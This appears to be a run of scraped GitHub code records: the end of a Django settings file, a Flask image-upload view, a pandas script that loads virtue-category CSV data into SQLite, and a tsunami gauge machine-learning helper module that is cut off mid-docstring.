'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'eventsfinder.urls'\n\nTEST_RUNNER = 'djangotoolbox.test.CapturingTestSuiteRunner'\n\nTEMPLATE_DIRS = (\n os.path.abspath(os.path.join(os.path.dirname( __file__ ), 'templates'))\n)\n\n\n#\nAUTHENTICATION_BACKENDS = (\n # 'social_auth.backends.twitter.TwitterBackend',\n # 'social_auth.backends.facebook.FacebookBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\n\nSOCIAL_AUTH_DEFAULT_USERNAME = 'new_social_auth_user'\nSOCIAL_AUTH_UID_LENGTH = 16\nSOCIAL_AUTH_ASSOCIATION_HANDLE_LENGTH = 16\nSOCIAL_AUTH_NONCE_SERVER_URL_LENGTH = 16\nSOCIAL_AUTH_ASSOCIATION_SERVER_URL_LENGTH = 16\nSOCIAL_AUTH_ASSOCIATION_HANDLE_LENGTH = 16\n\nSOCIAL_AUTH_ENABLED_BACKENDS = ('twitter', 'facebook')\n\n\nTWITTER_CONSUMER_KEY = ''\nTWITTER_CONSUMER_SECRET = ''\nFACEBOOK_APP_ID = ''\nFACEBOOK_API_SECRET = ''\n\nLOGIN_URL = '/login/'\nLOGIN_REDIRECT_URL = '/members/'\nLOGIN_ERROR_URL = '/login-error/'\n\n","repo_name":"martimarkov/eventsfinder","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"37995699831","text":"import helpers\nfrom app import app\nfrom models.user import User\nfrom models.image import Image\nfrom werkzeug.utils import secure_filename\nfrom flask_login import current_user, login_required\nfrom flask import Blueprint, render_template, request, redirect, flash, url_for\n\nimages_blueprint = Blueprint('images', __name__, template_folder='templates')\n\n@images_blueprint.route('/', methods=['POST'])\n@login_required\ndef create():\n user = User.get_by_id(current_user.id)\n if current_user == user:\n file = request.files[\"photo-post\"]\n\n if file and allowed_file(file.filename):\n file.filename = secure_filename(file.filename)\n helpers.upload_images_to_s3(file, app.config[\"S3_BUCKET\"], user.id)\n i = Image(image_path=file.filename,\n caption=request.form.get('caption'), user=user)\n if i.save():\n flash(f\"Image successfully uploaded.\")\n return redirect(url_for('users.show', username=user.username))\n else:\n return render_template('users/show.html', errors=user.errors)\n else:\n return render_template('users/show.html', errors={'Access': 'You do not have access to this page.'})\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in set(\n ['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n","repo_name":"kharissa/instagood","sub_path":"instagram_web/blueprints/images/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34494689082","text":"import pandas as pd\nimport numpy as np\nimport sqlite3\nimport virtueHolder as vt\n\n#\n# General Algorithm Mark 1:\n# 1) Split column names based on the underscores\n# 2) Then, classify whether it's preconditions, postconditions,\n# 2.1) ids are added by default, as STORY_ACTION_ID\n# 2.2) If it's accept or reject, then classify further on that\n# 2.3) If neither, go to the basic information set\n# 3) Choose table based on VIRTUE and The name after it\n# 4) Choose column based on the SUBVIRTUE/SUBVIRTUE and name concatenated\n# 5) SECOND_PERSON and THIRD_PERSON define those as True under separate headings\n# 6) Same with ABOVE and BELOW\n\n\n'''\n The above algorithm fails, here is mark 2:\n 1. Create 8 virtueHolder Objects\n 2. Generate them with the STORY_ACTION_ID column\n\n'''\n\n\n# What may be wise is to generate each of the columns as a dictionary, and then generate dataframes and then export\ndef sortColumn(dictionary, data, columnName):\n splitName = columnName.split(\"_\")\n searchStrings = [\"SUBVIRTUE\", \"SUBVICE\"]\n newColumnName = \"\"\n for search in searchStrings:\n print(splitName)\n if search in splitName:\n newColumnName = search\n try:\n if(splitName[splitName.index(search) + 1] not in \"SECOND\" and splitName[splitName.index(search) + 1] not in \"THIRD\" and splitName[splitName.index(search) + 1] not in \"ABOVE\" and splitName[splitName.index(search) + 1] not in \"BELOW\"):\n newColumnName = search + \"_\" + (splitName[splitName.index(search) + 1])\n except IndexError:\n print(\"Simply the subvirtue or subvice\")\n print(\"New Column Name: \" + newColumnName)\n dictionary.update({newColumnName : data[columnName]})\n\n\n\n\n\n\nisPrecondition = False\nisPostconditionaccept = False\nisPostconditionreject = False\nisAbove = False\nisBelow = False\nisSecondPerson = False\nisThirdPerson = False\nTABLE_NAME_VIRTUE = \"\"\nCOLUMN_NAME_SUBVIRTUE = \"\"\n\nCSVData = pd.read_csv('story_actions.csv')\n\nVIRTUE_FAITH = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nVIRTUE_HOPE = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nVIRTUE_CHARITY = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nVIRTUE_FORTITUDE = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nVIRTUE_PRUDENCE = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nVIRTUE_JUSTICE = pd.DataFrame()\nVIRTUE_TEMPERANCE = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nPASSIONS = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nBASICDATA = pd.DataFrame({\"ID\" : CSVData[\"id\"],\"TYPE\" : CSVData[\"TYPE\"], \"QUOTES_SCRIPTURE\": CSVData[\"QUOTES_SCRIPTURE\"]})\nSCRIPTUREBANK = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"], \"VersesList\": CSVData[\"SCRIPTURE_BANKVERSES\"]})\ncurrentTable = {}\n\n#test = vt.VirtueHolder(CSVData[\"id\"])\n\nfor col in CSVData:\n print(col)\n isPrecondition = False\n isPostconditionaccept = False\n isPostconditionreject = False\n isAbove = False\n isBelow = False\n isSecondPerson = False\n isThirdPerson = False\n if \"PRECONDITIONS\" in col:\n isPrecondition = True\n elif \"POSTCONDITIONS\" in col:\n if \"ACCEPT\" in col:\n isPostconditionaccept = True\n else:\n isPostconditionreject = True\n if \"ABOVE\" in col:\n isAbove = True\n if \"BELOW\" in col:\n isBelow = True\n if \"SECOND_PERSON\" in col:\n isSecondPerson = True\n if \"THIRD_PERSON\" in col:\n isThirdPerson = True\n VIRTUE_JUSTICE = VIRTUE_JUSTICE.append({\"IS_PRECONDITION\": isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject,\n \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\":\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson,\n \"THIRD_PERSON\": isThirdPerson}, ignore_index= True)\nprint(VIRTUE_JUSTICE)\nVIRTUE_JUSTICE.to_csv(\"JusticeTest.csv\")\nquit()\nVIRTUE_JUSTICE = pd.DataFrame({\"STORY_ACTION_ID\" : CSVData[\"id\"]})\nfor col in CSVData:\n isPrecondition = False\n isPostconditionaccept = False\n isPostconditionreject = False\n isAbove = False\n isBelow = False\n isSecondPerson = False\n isThirdPerson = False\n if \"PRECONDITIONS\" in col:\n isPrecondition = True\n elif \"POSTCONDITIONS\" in col:\n if \"ACCEPT\" in col:\n isPostconditionaccept = True\n else:\n isPostconditionreject = True\n if \"ABOVE\" in col:\n isAbove = True\n if \"BELOW\" in col:\n isBelow = True\n if \"SECOND_PERSON\" in col:\n isSecondPerson = True\n if \"THIRD_PERSON\" in col:\n isThirdPerson = True\n if \"VIRTUE_JUSTICE\" in col:\n VIRTUE_JUSTICE.append({\"IS_PRECONDITION\": isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject,\n \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\":\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson,\n \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_JUSTICE, CSVData, col)\n\n elif \"VIRTUE_TEMPERANCE\" in col:\n VIRTUE_TEMPERANCE.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_TEMPERANCE, CSVData, col)\n elif \"VIRTUE_PRUDENCE\" in col:\n VIRTUE_PRUDENCE.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_PRUDENCE, CSVData, col)\n elif \"VIRTUE_FORTITUDE\" in col:\n VIRTUE_FORTITUDE.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_FORTITUDE, CSVData, col)\n elif \"VIRTUE_CHARITY\" in col:\n VIRTUE_CHARITY.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_CHARITY, CSVData, col)\n elif \"VIRTUE_HOPE\" in col:\n VIRTUE_HOPE.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_HOPE, CSVData, col)\n elif \"VIRTUE_FAITH\" in col:\n VIRTUE_FAITH.append({\"IS_PRECONDITION\" : isPrecondition, \"IS_POSTCONDITION_REJECT\": isPostconditionreject, \"IS_POSTCONDITION_ACCEPT\": isPostconditionaccept, \"ABOVE\" :\n isAbove, \"BELOW\": isBelow, \"SECOND_PERSON\": isSecondPerson, \"THIRD_PERSON\": isThirdPerson}, ignore_index=True)\n sortColumn(VIRTUE_FAITH, CSVData, col)\n\nprint(\"PRUDENCE DICTIONARY\")\nprint(VIRTUE_PRUDENCE)\n\ncon = sqlite3.connect('ThomisticNarrativeDB.db')\nc = con.cursor()\n\ntoExport = pd.DataFrame.from_dict(VIRTUE_PRUDENCE)\ntoExport.to_sql('VIRTUE_PRUDENCE', con, if_exists='replace', index = False)\ntoExport = pd.DataFrame.from_dict(VIRTUE_FAITH)\ntoExport.to_sql('VIRTUE_FAITH', con, if_exists='replace', index = False)\ntoExport = pd.DataFrame.from_dict(VIRTUE_HOPE)\ntoExport.to_sql('VIRTUE_HOPE', con, if_exists='replace', index = False)\ntoExport = pd.DataFrame.from_dict(VIRTUE_CHARITY)\ntoExport.to_sql('VIRTUE_CHARITY', con, if_exists='replace', index = False)\ntoExport = pd.DataFrame.from_dict(VIRTUE_TEMPERANCE)\ntoExport.to_sql('VIRTUE_TEMPERANCE', con, if_exists='replace', index = False)\ntoExport = pd.DataFrame.from_dict(VIRTUE_FORTITUDE)\ntoExport.to_sql('VIRTUE_FORTITUDE', con, if_exists='replace', index = False)\ntoExport = pd.DataFrame.from_dict(VIRTUE_JUSTICE)\ntoExport.to_sql('VIRTUE_JUSTICE', con, if_exists='replace', index = False)\n\n","repo_name":"TercioOfParma/Thomistic-Narrative-Generator","sub_path":"CSV to Tables Plural.py","file_name":"CSV to Tables Plural.py","file_ext":"py","file_size_in_byte":8659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10252696979","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 7 08:54:57 2021\n\nTo-Do:\n data exploration and plotting functions\n\n@author: Chris\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport os\nfrom pylab import *\nfrom matplotlib.lines import Line2D\n\nfrom sklearn.preprocessing import StandardScaler\n# from sklearn.svm import SVR, SVC, LinearSVC\nfrom sklearn.base import clone\n#from sklearn.linear_model import Ridge, Lasso, ElasticNet\nfrom sklearn.metrics import explained_variance_score, accuracy_score\n\n#from tsfresh import extract_features, select_features\n#from tsfresh.feature_selection import relevance\n#from tsfresh.utilities.dataframe_functions import impute\n#from tsfresh.feature_extraction import ComprehensiveFCParameters, settings\n\n\"\"\"\nLoading data, data exploration\n\"\"\" \n \ndef load_data(outdir, rnums, gaugenos):\n \"\"\"\n Loads data from specified runs and gauge numbers\n Input:\n outdir - outer directory containing runs and corresponding gauge data\n rnums - Run numbers to be loaded\n gaugenos - Gauge numbers to be loaded\n \n Output:\n eta: Dictionary of eta data with the form: eta[(run_number, gauge_number)]\n t: Dictionary of time intervals of the form: t[(run_number, gauge_number)]\n \"\"\"\n eta = {}\n t = {}\n for rnum in rnums:\n rundir = os.path.join(outdir, 'run_%s' % str(rnum).zfill(6))\n for gaugeno in gaugenos:\n gfile = '%s/gauge%s.txt' % (rundir, str(gaugeno).zfill(5))\n g_data = np.genfromtxt(gfile, delimiter=',')\n\n # data in this case has a NaN value for eta @ t=0\n t[(rnum,gaugeno)] = g_data[1:,0] # seconds\n eta[(rnum,gaugeno)] = g_data[1:,1] # surface elevation in meters\n \n return eta, t\n\n\"\"\"\nPre-processing, label creation\n\"\"\"\n\ndef max_eta(data,gaugeno,runs):\n \"\"\"\n Finds the max eta for a specific gauge and run(s)\n Input:\n data - Dictionary of timeseries data with the form: data[(run_number, gauge_number)]\n gaugeno - Integer gauge number\n runs - List or range of run numbers to find the max value for\n \n Output:\n eta_max - np array containing the maximum values.\n \"\"\"\n eta_max = []\n for rnum in runs:\n eta_max.append(np.amax(data[(rnum,gaugeno)]))\n return np.array(eta_max)\n\ndef get_thresh(data,threshold):\n \"\"\"\n Finds index of time series when threshold is met or exceeded\n Input:\n data - Numpy array of time series\n threshold - int/double that each entry in the time series is compared against \n \n Returns:\n i - Integer index of time series when threshold is met or exceeded\n OR\n math.nan - Returns NaN if threshold is not met/exceeded\n \"\"\"\n for i in range(len(data)):\n if np.abs(data[i]) >= threshold:\n return i\n return math.nan\n\n#Document later. Creates matrix with raw time series\ndef stack_series_raw(data, time, gaugeno, rnums, gnum_thresh, g_thresh, threshold, tsteps, subs_thresh, subs_time):\n runs_used = []\n g = []\n times = []\n tstart = []\n \n for rnum in rnums:\n g_data = data[(rnum,gaugeno)]\n t_data = time[(rnum,gaugeno)]\n w_ind = get_thresh(g_data,threshold) #returns NaN if threshold is not met/exceeded for input window\n g_ind = get_thresh(data[(rnum,gnum_thresh)],g_thresh) #returns NaN if threshold is not met/exceeded for target gauge\n \n if not math.isnan(w_ind) and not math.isnan(g_ind) and np.average(g_data[0:subs_time]) > subs_thresh:\n #checking to see if there is enough data after threshold is met/exceeded\n if w_ind+tsteps < len(g_data):\n runs_used.append(rnum)\n tstart.append(w_ind)\n g.append(g_data[w_ind:w_ind+tsteps])\n times.append(t_data[w_ind:w_ind+tsteps])\n# else:\n# g.extend(g_data[w_ind:].tolist())\n# times.extend(t_data[w_ind:].tolist())\n return np.asarray(g), runs_used, np.asarray(times), tstart\n\ndef stack_series(data, time, gaugeno, rnums, gnum_thresh, g_thresh, threshold, tsteps, subs_thresh, subs_time):\n \n \"\"\"\n Stacks the time series used to construct the dataframe for feature extraction with thresholding.\n Input:\n data - Dictionary of eta data with the form: data[(run_number, gauge_number)]\n time - Dictionary of time intervals of the form: time[(run_number, gauge_number)]\n gaugeno - Integer gauge number\n runs - Integer total number of runs\n gnum_thresh - Integer gauge number of target gauge used in prediction we are also thresholding\n g_thresh - Threshold eta of target gauge\n threshold - int/double that each entry in the time series is compared against for gaugeno\n tsteps - Number of time steps to extract after threshold is met\n subs_thresh - Threshold for average initial subsidence\n subs_time - Time steps over which the average subsidence is taken\n \n Returns:\n g - Stacked eta time series of the form [(Run#0000,Gauge#702),(Run#0001,Gauge#702), ..., (Run#1299,Gauge#702)]\n run_id - ID used to identify which run number the time series belongs to, ranges from 0 to 1299\n runs_used - List containing the run numbers used (met the threshold). Not used for feature extraction\n times - The time scale/interval corresponding to an eta time series\n tstart - The indices where each time series met or exceeded the threshold. Not used for feature extraction\n \"\"\"\n runs_used = []\n g = []\n times = []\n run_id = []\n tstart = []\n \n for rnum in rnums:\n g_data = data[(rnum,gaugeno)]\n t_data = time[(rnum,gaugeno)]\n w_ind = get_thresh(g_data,threshold) #returns NaN if threshold is not met/exceeded for input window\n g_ind = get_thresh(data[(rnum,gnum_thresh)],g_thresh) #returns NaN if threshold is not met/exceeded for target gauge\n \n if not math.isnan(w_ind) and not math.isnan(g_ind) and np.average(g_data[0:subs_time]) > subs_thresh: \n runs_used.append(rnum)\n tstart.append(w_ind)\n \n #checking to see if there is enough data after threshold is met/exceeded\n if w_ind+tsteps < len(g_data):\n g.extend(g_data[w_ind:w_ind+tsteps].tolist())\n times.extend(t_data[w_ind:w_ind+tsteps].tolist())\n run_id.extend((np.ones(tsteps)*rnum).tolist())\n else:\n g.extend(g_data[w_ind:].tolist())\n times.extend(t_data[w_ind:].tolist())\n run_id.extend((np.ones(len(g_data)-w_ind)*rnum).tolist())\n\n return g, run_id, runs_used, times, tstart\n\ndef stack_series_all(data, time, gaugeno, runs):\n \"\"\"\n Stacks the time series used to construct the dataframe for feature extraction without thresholding.\n Input:\n data - Dictionary of eta data with the form: data[(run_number, gauge_number)]\n time - Dictionary of time intervals of the form: time[(run_number, gauge_number)]\n gaugeno - Integer gauge number\n runs - Integer total number of runs\n \n Returns:\n g - Stacked eta time series of the form [(Run#0000,Gauge#702),(Run#0001,Gauge#702), ..., (Run#1299,Gauge#702)]\n run_id - ID used to identify which run number the time series belongs to, ranges from 0 to 1299\n times - The time scale/interval corresponding to an eta time series\n \"\"\"\n \n rnums = range(0,runs)\n \n g = []\n times = []\n run_id = []\n \n for rnum in rnums:\n g_data = data[(rnum,gaugeno)]\n t_data = time[(rnum,gaugeno)]\n \n g.extend(g_data.tolist())\n times.extend(t_data.tolist())\n run_id.extend((np.ones(len(g_data))*rnum).tolist())\n\n return g, run_id, times\n\ndef max_eta_all(data,gaugeno,runs):\n \"\"\"\n Finds the max eta for all runs and a specific gauge \n Input:\n data - Dictionary of timeseries data with the form: data[(run_number, gauge_number)]\n gaugeno - Integer gauge number\n runs - Number of runs\n \n Output:\n eta_max - np array containing the maximum values.\n \"\"\"\n eta_max = []\n for rnum in range(runs):\n eta_max.append(np.amax(data[(rnum,gaugeno)]))\n return np.array(eta_max)\n\ndef classify_labels(maxeta,cat):\n \"\"\"\n Creates labels for classifcation from the max eta values by binning each\n realization\n Input:\n maxeta: np array containig max eta values\n cat: bin edges\n Output:\n Classification labels\n \"\"\"\n labels = []\n for gmax in maxeta:\n if gmax < cat[0]:\n labels.append('A')\n elif gmax < cat[1]:\n labels.append('B')\n elif gmax < cat[2]:\n labels.append('C')\n else:\n labels.append('D')\n return np.array(labels)\n\n# using donsubs indices, do documentation\ndef train_test_split(data, target, train_runs, test_runs):\n train = data[train_runs,:]\n train_target = target[train_runs]\n test = data[test_runs,:]\n test_target = target[test_runs]\n return train, test, train_target, test_target\n\n\"\"\"\nBuild/Train/Test Model\n\"\"\"\n\n#redo documentation\n# changed to numpy arrays\ndef train_test(data, target, runs_used, train_ind, test_ind, scale, c_or_r, model, *returns):\n \"\"\"\n Trains and tests the model using non-linear SVR/SVC. \n \n Input:\n feat - List of feature dataframes\n target - Array of target values for regression\n scale - Boolean value to denote whether features should be scaled or not to unit variance and 0 mean.\n c_or_r - Value for specifying classification or regression\n *returns - Boolean value to determine whether scalers and models need to be returned.\n \n Output:\n pred - List of arrays of predictions from testing the model after it is trained\n target - List of arrays of targets that correspond to runs in the test set\n evs - List of explained variance scores for each dataset.\n scalers - List of standard scalers used (Optional)\n models - List of models used (Optional)\n \"\"\"\n data_tmp = data\n pred = []\n tr_pred = []\n targets = []\n acc = []\n \n if returns:\n scalers = [] # empty is scale = false\n models = []\n\n for i in range(len(data)):\n \n # Check file format\n if isinstance(data_tmp[i],pd.DataFrame):\n train_set, test_set, train_target, test_target, = \\\n train_test_split(data_tmp[i].to_numpy(), target, train_ind, test_ind)\n else:\n train_set, test_set, train_target, test_target, = \\\n train_test_split(data_tmp[i], target, train_ind, test_ind) \n \n if scale:\n scaler = StandardScaler()\n train_set = scaler.fit_transform(train_set)\n test_set = scaler.transform(test_set)\n \n model_tmp = clone(model)\n \n model_tmp.fit(train_set, train_target, sample_weight=None)\n \n pred.append(model_tmp.predict(test_set))\n tr_pred.append(model_tmp.predict(train_set))\n \n if c_or_r == 'r':\n acc.append(explained_variance_score(test_target,pred[i]))\n else:\n acc.append(accuracy_score(test_target,pred[i]))\n \n targets.append(test_target)\n \n if returns:\n models.append(model_tmp)\n if scale:\n scalers.append(scaler)\n \n if returns:\n return pred, tr_pred, targets, acc, scalers, models\n else:\n return pred, tr_pred, targets, acc\n\n\"\"\"\nExploring/Plotting Model Results\n\"\"\"\ndef find_inacc_runs(pred, target, runs, n):\n \n \"\"\"\n Finds runs of the n largest absolute difference between predicted and actual and outputs a pandas dataframe. \n\n Input:\n pred - Prediction from regression model\n target - Actual max eta value\n runs - run numbers used for the testing set\n n - number of largest absolute differences returned\n \n Output:\n pd.Dataframe - pandas datafram containing the run numbers, predicted and actual eta, and absolute difference\n of predicted and actual.\n \"\"\"\n \n difference = np.abs(pred-target)\n ind = difference.argsort()[-n:][::-1]\n \n run_dict = {'Run Number' : np.array(runs)[ind], 'Predicted' : pred[ind], 'Actual' : target[ind], \n 'Abs Diff': difference[ind]}\n \n return pd.DataFrame(data = run_dict)\n\ndef find_run(pred, target, runs, run_num):\n \"\"\"\n Prints predicted and actual max eta for a specified run. \n\n Input:\n pred - Prediction from regression model\n target - Actual max eta value\n runs - run numbers used for the testing set\n run_num - specified run number\n\n \"\"\"\n\n ind = np.where(runs == run_num)\n \n if len(ind[0]) == 1:\n print(\"Run Number:\" + str(run_num) + \", Predicted:\" + str(pred[ind]) + \", Actual:\" + str(target[ind]))\n else:\n print(\"Run not found.\")\n\ndef plot_test_all(target,pred,line,zoomlim, labels):\n \"\"\"\n Plots the predicted versus actual value for both datasets along with a reference line of slope 1.\n \n Input\n target - Target values\n pred - Predicted values\n line - Endpoint of reference line\n zoomlim - x and y limit for the zoomed in subplot\n labels - labels for the legend\n \"\"\"\n #legend\n \n fig = figure(figsize=(13,7))\n \n ax = fig.add_subplot(1,2,1)\n \n plot(target[0],pred[0],color='tab:orange',marker='.',linestyle='None') \n plot(target[1],pred[1],color='tab:blue',marker='.',linestyle='None')\n \n plot([0,line],[0,line],'k--')\n \n ax.legend(labels)\n \n xlabel('Max eta (Actual)')\n ylabel('Max eta (Predicted)')\n \n xlim(0,line)\n ylim(0,line)\n ax.set_aspect('equal', adjustable='box')\n \n grid(True)\n \n ax2 = fig.add_subplot(1,2,2)\n \n plot(target[0],pred[0],color='tab:orange',marker='.',linestyle='None') \n plot(target[1],pred[1],color='tab:blue',marker='.',linestyle='None')\n \n plot([0,zoomlim],[0,zoomlim],'k--')\n \n xlabel('Max eta (Actual)')\n ylabel('Max eta (Predicted)')\n \n xlim(0,zoomlim)\n ylim(0,zoomlim)\n ax2.set_aspect('equal', adjustable='box')\n \n grid(True)\n\ndef plot_test(target,pred,line,zoomlim,setnum):\n \"\"\"\n Plots the predicted versus actual value for a single dataset along with a reference line of slope 1.\n \n Input\n target - Target values\n pred - Predicted values\n line - Endpoint of reference line\n zoomlim - x and y limit for the zoomed in subplot\n \"\"\"\n \n fig = figure(figsize=(13,7))\n \n ax = fig.add_subplot(1,2,1)\n \n plt.plot(target[setnum],pred[setnum],'.r') \n \n plot([0,line],[0,line],'k--')\n \n xlabel('Max eta (Actual)')\n ylabel('Max eta (Predicted)')\n \n plt.xlim(0,line)\n plt.ylim(0,line)\n ax.set_aspect('equal', adjustable='box')\n \n grid(True)\n \n ax2 = fig.add_subplot(1,2,2)\n \n plt.plot(target[setnum],pred[setnum],'.r')\n \n plot([0,zoomlim],[0,zoomlim],'k--')\n \n xlabel('Max eta (Actual)')\n ylabel('Max eta (Predicted)')\n \n plt.xlim(0,zoomlim)\n plt.ylim(0,zoomlim)\n ax2.set_aspect('equal', adjustable='box')\n \n grid(True)\n \ndef plot_run(data, time, starttime, runs, rnum, gaugeno, inputg, winnum, winsize, grid, *pred):\n \n \"\"\"\n Plots gauge 702 and a specified 9XX gauge for a specified run number (Temporarily commented out the horizontal lines)\n \n Input:\n data - Dictionary of eta data with the form: data[(run_number, gauge_number)]\n time - Dictionary of time intervals of the form: time[(run_number, gauge_number)]\n starttime - The indices where each time series met or exceeded the threshold.\n runs - List containing the run numbers used (met the threshold).\n rnum - Run number of interest\n gaugeno - Gauge number of interest\n inputg - Input gauge number\n winnum - Integer index of data set of interest\n winsize - Number of time steps to extract after threshold is met for the given dataset\n *pred - optional argument for printing predicted value on title of plot\n \"\"\"\n \n fig, (ax1, ax2) = plt.subplots(2,sharex=True, sharey=False,figsize=(12,10))\n \n title = 'Run # %s' % rnum\n \n if pred:\n title =title + ', Predicted: %sm' % np.around(pred[0],2)\n \n ax1.set_title(title, fontsize=20,)\n \n fig.add_subplot(111, frameon=False) # used for centering the y-axis label\n \n ax1.plot(time[(rnum,inputg)]/60, data[(rnum,inputg)], label=\"Gauge # %s\" % str(inputg), color='blue')\n ax1.grid(True)\n ax1.legend(loc='upper left')\n \n \n #Plot window of data used and reference line for threshold. \n start = starttime[winnum][runs.index(rnum)]*grid\n end = (start + (winsize[winnum]-1)*grid)\n ax1.axvline(start/60, color ='red', ls='--', lw=1, alpha = 0.8)\n ax1.axvline(end/60, color ='red', ls='--', lw=1, alpha = 0.8)\n\n ax2.plot(time[(rnum,gaugeno)]/60, data[(rnum,gaugeno)], label='Gauge # %s' % str(gaugeno), color='blue')\n ax2.grid(True)\n ax2.legend(loc='upper left')\n \n plt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False) # used for centering the y-axis label\n plt.xlabel('Minutes after quake', fontsize=16)\n plt.ylabel('Surface elevation (meters)', fontsize=16)\n \ndef save_run_plots(data, time, starttime, runs, rnums, pred, gaugeno, winnum, winsize):\n \"\"\"\n Saves plots of eta for specified runs of gauge 702 and a specified gauge 9XX as a png.\n \n Input:\n data - Dictionary of eta data with the form: data[(run_number, gauge_number)]\n time - Dictionary of time intervals of the form: time[(run_number, gauge_number)]\n starttime - The indices where each time series met or exceeded the threshold.\n runs - List containing the run numgbers used (met the threshold).\n rnums - Run numbers of interest\n pred - Predicted values for runs of interest\n winnum - Integer index of data set of interest\n winsize - Number of time steps to extract after threshold is met for the given dataset\n gaugeno - Gauge number of interest\n \"\"\"\n for i in range(len(rnums)):\n plot_run(data, time, starttime, runs, rnums[i], gaugeno, winnum, winsize, pred[i])\n plt.savefig(\"r%s_g%s.png\" % (rnums[i],gaugeno))\n\n\"\"\"\nPredict\n\"\"\"\ndef predict(scalers,models,feats):\n scalers_f = scalers\n models_f = models\n \n pred = []\n\n for i in range(len(feats)):\n model_temp = models_f[i]\n ft_temp = feats[i]\n \n if len(scalers_f) != 0:\n scale_temp = scalers_f[i]\n \n if isinstance(ft_temp,pd.DataFrame):\n ft_temp = scale_temp.transform(ft_temp[ft_temp.columns])\n else:\n ft_temp = scale_temp.transform(ft_temp.reshape(1, -1))\n\n pred.append(model_temp.predict(ft_temp)[0])\n \n return pred\n\n\"\"\"\nOld Functions\n\"\"\"\n\n# Redo documentation\n# changed to numpy arrays\n# old method\ndef train_test_split_old(data, target, runs_used, test_size, seed):\n \"\"\"\n Splits data and target into training and testing sets for a given random seed. Keeps track of which runs are\n put into training and testing sets.\n \n Input\n data - Dataframe of data samples\n target - np array of targets\n runs_used - np array of run numbers used\n test_size - test size as a fraction of the total samples (between 0 and 1)\n seed - seed used for random number generator\n Output\n train - Dataframe of training data\n test - Dataframe of testing data\n train_target - np array of training targets\n test_target - np array of testing targets\n train_runs - np array of run numbers in training data\n test_runs - np array of run numbers in testing data\n \n \"\"\"\n np.random.seed(seed)\n \n total = len(target)\n \n tt_size = np.round(total*test_size)\n tr_size = int(total - tt_size)\n \n perm = np.random.permutation(total)\n \n train = data[perm[:tr_size],:]\n train_target = target[perm[0:tr_size]]\n train_runs = runs_used[perm[0:tr_size]]\n \n test = data[perm[tr_size:],:]\n test_target = target[perm[tr_size:]]\n test_runs = runs_used[perm[tr_size:]]\n \n return train, test, train_target, test_target, train_runs, test_runs\n\ndef train_test_old(feat, target, runs_used, testsize, rseed, scale, c_or_r, model, *returns):\n \"\"\"\n Trains and tests the model using non-linear SVR/SVC. \n \n Input:\n feat - List of feature dataframes\n target - Array of target values for regression\n runs_used - Array of run numbers in the model\n scale - Boolean value to denote whether features should be scaled or not to unit variance and 0 mean.\n c_or_r - Value for specifying classification or 